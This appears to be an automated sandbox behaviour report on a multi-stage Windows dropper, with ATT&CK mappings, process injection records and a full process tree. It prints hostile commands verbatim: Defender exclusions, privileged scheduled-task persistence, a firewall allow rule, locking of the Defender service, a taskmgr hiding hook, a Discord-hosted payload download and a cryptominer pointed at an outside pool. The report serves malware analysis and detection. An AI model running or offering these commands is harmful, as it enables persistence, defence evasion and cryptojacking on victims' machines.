Query Registry

T1012

System Information Discovery

T1082

Processes:

U1J80~1.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	U1J80~1.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	U1J80~1.EXE

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3360	schtasks.exe
5060	schtasks.exe
2884	schtasks.exe
1588	schtasks.exe
3248	schtasks.exe
3152	schtasks.exe
5212	schtasks.exe
4480	schtasks.exe
3596	schtasks.exe
5072	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

2628 timeout.exe
5332 timeout.exe

pid	process
2628	timeout.exe
5332	timeout.exe

GoLang User-Agent 8 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	3326	Go-http-client/1.1
HTTP User-Agent header	3327	Go-http-client/1.1
HTTP User-Agent header	4629	Go-http-client/1.1
HTTP User-Agent header	4630	Go-http-client/1.1
HTTP User-Agent header	6667	Go-http-client/1.1
HTTP User-Agent header	206	Go-http-client/1.1
HTTP User-Agent header	207	Go-http-client/1.1
HTTP User-Agent header	215	Go-http-client/1.1

Modifies registry class 5 IoCs

Processes:

288C47~1.EXEasdfg.exeINSTAL~1.EXEVertex_Craze_20240225061753481.exeFUCKER.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	288C47~1.EXE
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	asdfg.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	INSTAL~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	Vertex_Craze_20240225061753481.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	FUCKER.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

5956 reg.exe
5992 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

1704 PING.EXE
4088 PING.EXE
4780 PING.EXE
5764 PING.EXE

pid	process
5956	reg.exe
5992	reg.exe

pid	process
1704	PING.EXE
4088	PING.EXE
4780	PING.EXE
5764	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

RegAsm.exenetTimer.exeasdfg.exe_VTI_CNF.exeasdfg.exedialer.exeU1J80~1.EXE

pid	process
3292	RegAsm.exe
3292	RegAsm.exe
4656	netTimer.exe
4656	netTimer.exe
4656	netTimer.exe
4656	netTimer.exe
360	asdfg.exe
360	asdfg.exe
1232	_VTI_CNF.exe
1232	_VTI_CNF.exe
3588	asdfg.exe
3588	asdfg.exe
2584	dialer.exe
2584	dialer.exe
2584	dialer.exe
2584	dialer.exe
464	U1J80~1.EXE
464	U1J80~1.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

FUCKER.exeRegAsm.exeRegAsm.exeasdfg.exenetTimer.exeBBLb.exeBBLb.exe

description	pid	process
Token: SeDebugPrivilege	4200	FUCKER.exe
Token: SeDebugPrivilege	2596	RegAsm.exe
Token: SeDebugPrivilege	3292	RegAsm.exe
Token: SeDebugPrivilege	360	asdfg.exe
Token: SeDebugPrivilege	4656	netTimer.exe
Token: SeDebugPrivilege	4336	BBLb.exe
Token: SeDebugPrivilege	3820	BBLb.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

U1J81~1.EXE

pid process

5072 U1J81~1.EXE

pid	process
5072	U1J81~1.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

FUCKER.exeVertex_Craze_20240225061753481.exesvchost.comsvchost.comswizzyy.exesvchost.comsvchost.comCRYPTO~1.EXEsvchost.comsvchost.comsvchost.comsvchost.com

description	pid	process	target process
PID 4200 wrote to memory of 3236	4200	FUCKER.exe	Vertex_Craze_20240225061753481.exe
PID 4200 wrote to memory of 3236	4200	FUCKER.exe	Vertex_Craze_20240225061753481.exe
PID 4200 wrote to memory of 3236	4200	FUCKER.exe	Vertex_Craze_20240225061753481.exe
PID 3236 wrote to memory of 1660	3236	Vertex_Craze_20240225061753481.exe	Vertex_Craze_20240225061753481.exe
PID 3236 wrote to memory of 1660	3236	Vertex_Craze_20240225061753481.exe	Vertex_Craze_20240225061753481.exe
PID 4200 wrote to memory of 4104	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 4104	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 4104	4200	FUCKER.exe	svchost.com
PID 4104 wrote to memory of 1340	4104	svchost.com	APEX_V~1.EXE
PID 4104 wrote to memory of 1340	4104	svchost.com	APEX_V~1.EXE
PID 4200 wrote to memory of 4940	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 4940	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 4940	4200	FUCKER.exe	svchost.com
PID 4940 wrote to memory of 1804	4940	svchost.com	swizzyy.exe
PID 4940 wrote to memory of 1804	4940	svchost.com	swizzyy.exe
PID 4940 wrote to memory of 1804	4940	svchost.com	swizzyy.exe
PID 1804 wrote to memory of 2596	1804	swizzyy.exe	RegAsm.exe
PID 1804 wrote to memory of 2596	1804	swizzyy.exe	RegAsm.exe
PID 1804 wrote to memory of 2596	1804	swizzyy.exe	RegAsm.exe
PID 1804 wrote to memory of 2596	1804	swizzyy.exe	RegAsm.exe
PID 1804 wrote to memory of 2596	1804	swizzyy.exe	RegAsm.exe
PID 1804 wrote to memory of 2596	1804	swizzyy.exe	RegAsm.exe
PID 1804 wrote to memory of 2596	1804	swizzyy.exe	RegAsm.exe
PID 1804 wrote to memory of 2596	1804	swizzyy.exe	RegAsm.exe
PID 4200 wrote to memory of 4932	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 4932	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 4932	4200	FUCKER.exe	svchost.com
PID 4932 wrote to memory of 2868	4932	svchost.com	TEST_2~1.EXE
PID 4932 wrote to memory of 2868	4932	svchost.com	TEST_2~1.EXE
PID 4200 wrote to memory of 1752	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 1752	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 1752	4200	FUCKER.exe	svchost.com
PID 1752 wrote to memory of 4204	1752	svchost.com	CRYPTO~1.EXE
PID 1752 wrote to memory of 4204	1752	svchost.com	CRYPTO~1.EXE
PID 1752 wrote to memory of 4204	1752	svchost.com	CRYPTO~1.EXE
PID 4204 wrote to memory of 3292	4204	CRYPTO~1.EXE	RegAsm.exe
PID 4204 wrote to memory of 3292	4204	CRYPTO~1.EXE	RegAsm.exe
PID 4204 wrote to memory of 3292	4204	CRYPTO~1.EXE	RegAsm.exe
PID 4204 wrote to memory of 3292	4204	CRYPTO~1.EXE	RegAsm.exe
PID 4204 wrote to memory of 3292	4204	CRYPTO~1.EXE	RegAsm.exe
PID 4204 wrote to memory of 3292	4204	CRYPTO~1.EXE	RegAsm.exe
PID 4204 wrote to memory of 3292	4204	CRYPTO~1.EXE	RegAsm.exe
PID 4204 wrote to memory of 3292	4204	CRYPTO~1.EXE	RegAsm.exe
PID 4200 wrote to memory of 3436	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 3436	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 3436	4200	FUCKER.exe	svchost.com
PID 3436 wrote to memory of 344	3436	svchost.com	ENIGMA~1.EXE
PID 3436 wrote to memory of 344	3436	svchost.com	ENIGMA~1.EXE
PID 4200 wrote to memory of 1296	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 1296	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 1296	4200	FUCKER.exe	svchost.com
PID 1296 wrote to memory of 360	1296	svchost.com	asdfg.exe
PID 1296 wrote to memory of 360	1296	svchost.com	asdfg.exe
PID 1296 wrote to memory of 360	1296	svchost.com	asdfg.exe
PID 4200 wrote to memory of 2056	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 2056	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 2056	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 2372	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 2372	4200	FUCKER.exe	svchost.com
PID 4200 wrote to memory of 2372	4200	FUCKER.exe	svchost.com
PID 2056 wrote to memory of 1232	2056	svchost.com	_VTI_CNF.exe
PID 2056 wrote to memory of 1232	2056	svchost.com	_VTI_CNF.exe
PID 2056 wrote to memory of 1232	2056	svchost.com	_VTI_CNF.exe
PID 2372 wrote to memory of 3360	2372	svchost.com	more.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2492

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2584

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
PID:4484

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4200

C:\Users\Admin\AppData\Local\Temp\Files\Vertex_Craze_20240225061753481.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Vertex_Craze_20240225061753481.exe"
2⤵
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3236

C:\Users\Admin\AppData\Local\Temp\3582-490\Vertex_Craze_20240225061753481.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\Vertex_Craze_20240225061753481.exe"
3⤵
- Executes dropped EXE
PID:1660

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\APEX_V~1.EXE"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4104

C:\Users\Admin\AppData\Local\Temp\Files\APEX_V~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\APEX_V~1.EXE
3⤵
- Executes dropped EXE
PID:1340

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4940

C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe
C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2596

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TEST_2~1.EXE"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4932

C:\Users\Admin\AppData\Local\Temp\Files\TEST_2~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\TEST_2~1.EXE
3⤵
- Executes dropped EXE
PID:2868

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1752

C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\delete.bat" "
5⤵
PID:1868

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
6⤵
- Runs ping.exe
PID:1704

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ENIGMA~1.EXE"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3436

C:\Users\Admin\AppData\Local\Temp\Files\ENIGMA~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\ENIGMA~1.EXE
3⤵
- Executes dropped EXE
PID:344

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1296

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:360

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\BBLb.exe"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2608

C:\Users\Admin\AppData\Local\Temp\BBLb.exe
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Users\Admin\AppData\Local\Temp\BBLb.exe
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3820

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
4⤵
- Executes dropped EXE
PID:4036

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 448
5⤵
- Program crash
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 480
5⤵
- Program crash
PID:1400

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\_VTI_CNF.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2056

C:\Users\Admin\AppData\Local\Temp\Files\_VTI_CNF.exe
C:\Users\Admin\AppData\Local\Temp\Files\_VTI_CNF.exe
3⤵
- Modifies WinLogon for persistence
- Disables RegEdit via registry modification
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C AT /delete /yes
4⤵
PID:3648

C:\Windows\SysWOW64\at.exe
AT /delete /yes
5⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
4⤵
PID:2444

C:\Windows\SysWOW64\at.exe
AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
5⤵
PID:564

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2372

C:\Users\Admin\AppData\Local\Temp\Files\more.exe
C:\Users\Admin\AppData\Local\Temp\Files\more.exe
3⤵
- Executes dropped EXE
PID:3360

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
4⤵
PID:2276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe
5⤵
PID:692

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF9B3.tmp"
4⤵
PID:4780

C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe /Create /TN Updates\UiKVWpFsayx /XML C:\Users\Admin\AppData\Local\Temp\tmpF9B3.tmp
5⤵
- Creates scheduled task(s)
PID:5060

C:\Users\Admin\AppData\Local\Temp\Files\more.exe
"C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
4⤵
PID:2916

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"' & exit
5⤵
PID:3696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn images /tr '"C:\Users\Admin\AppData\Roaming\images.exe"' & exit
6⤵
PID:4580

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn images /tr '"C:\Users\Admin\AppData\Roaming\images.exe"'
7⤵
- Creates scheduled task(s)
PID:3596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp362F.tmp.bat""
5⤵
PID:1580

C:\Windows\SysWOW64\timeout.exe
timeout 3
6⤵
- Delays execution with timeout.exe
PID:2628

C:\Users\Admin\AppData\Roaming\images.exe
"C:\Users\Admin\AppData\Roaming\images.exe"
6⤵
PID:2796

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
7⤵
PID:708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe
8⤵
PID:3248

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDE47.tmp"
7⤵
PID:2248

C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe /Create /TN Updates\UiKVWpFsayx /XML C:\Users\Admin\AppData\Local\Temp\tmpDE47.tmp
8⤵
- Creates scheduled task(s)
PID:2884

C:\Users\Admin\AppData\Roaming\images.exe
"C:\Users\Admin\AppData\Roaming\images.exe"
7⤵
PID:3832

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\netTimer.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2528

C:\Users\Admin\AppData\Local\Temp\Files\netTimer.exe
C:\Users\Admin\AppData\Local\Temp\Files\netTimer.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\288C47~1.EXE"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1900

C:\Users\Admin\AppData\Local\Temp\Files\288C47~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\288C47~1.EXE
3⤵
- Executes dropped EXE
- Modifies registry class
PID:4740

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1540

C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE
C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE
5⤵
- Executes dropped EXE
- Modifies registry class
PID:1988

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U1J80~1.EXE"
6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2140

C:\Users\Admin\AppData\Local\Temp\U1J80~1.EXE
C:\Users\Admin\AppData\Local\Temp\U1J80~1.EXE
7⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 2112
8⤵
- Program crash
PID:4328

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U1J81~1.EXE"
6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1408

C:\Users\Admin\AppData\Local\Temp\U1J81~1.EXE
C:\Users\Admin\AppData\Local\Temp\U1J81~1.EXE
7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
8⤵
PID:648

C:\Windows\SysWOW64\chcp.com
chcp 1251
9⤵
PID:1220

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
9⤵
- Creates scheduled task(s)
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 988
6⤵
- Program crash
PID:4928

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1524

C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
5⤵
- Executes dropped EXE
PID:3444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
"C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
6⤵
PID:564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:1544

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
7⤵
PID:816

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
8⤵
- Modifies Windows Firewall
PID:328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:3172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:3448

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
7⤵
PID:1104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
PID:1380

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
8⤵
- Creates scheduled task(s)
PID:1588

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
8⤵
PID:3904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
PID:1660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
PID:816

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
8⤵
PID:3700

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
8⤵
- Creates scheduled task(s)
PID:3248

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
8⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
9⤵
PID:3004

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
10⤵
- Launches sc.exe
PID:2324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
PID:3548

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
8⤵
PID:2112

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 18e4720f-44ed-4de0-ab36-ba2166952532 --tls --nicehash -o showlock.net:443 --rig-id 18e4720f-44ed-4de0-ab36-ba2166952532 --tls --nicehash -o showlock.net:80 --rig-id 18e4720f-44ed-4de0-ab36-ba2166952532 --nicehash --http-port 3433 --http-access-token 18e4720f-44ed-4de0-ab36-ba2166952532 --randomx-wrmsr=-1
9⤵
PID:2940

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe -hide 2940
9⤵
PID:5076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
10⤵
PID:4372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
PID:3328

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
8⤵
- Creates scheduled task(s)
PID:3152

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
8⤵
PID:2652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
PID:964

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
8⤵
PID:4892

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
8⤵
- Creates scheduled task(s)
PID:5212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
PID:5260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
PID:4844

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"
2⤵
PID:2052

C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe
C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe
3⤵
PID:724

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE"
2⤵
PID:3316

C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE
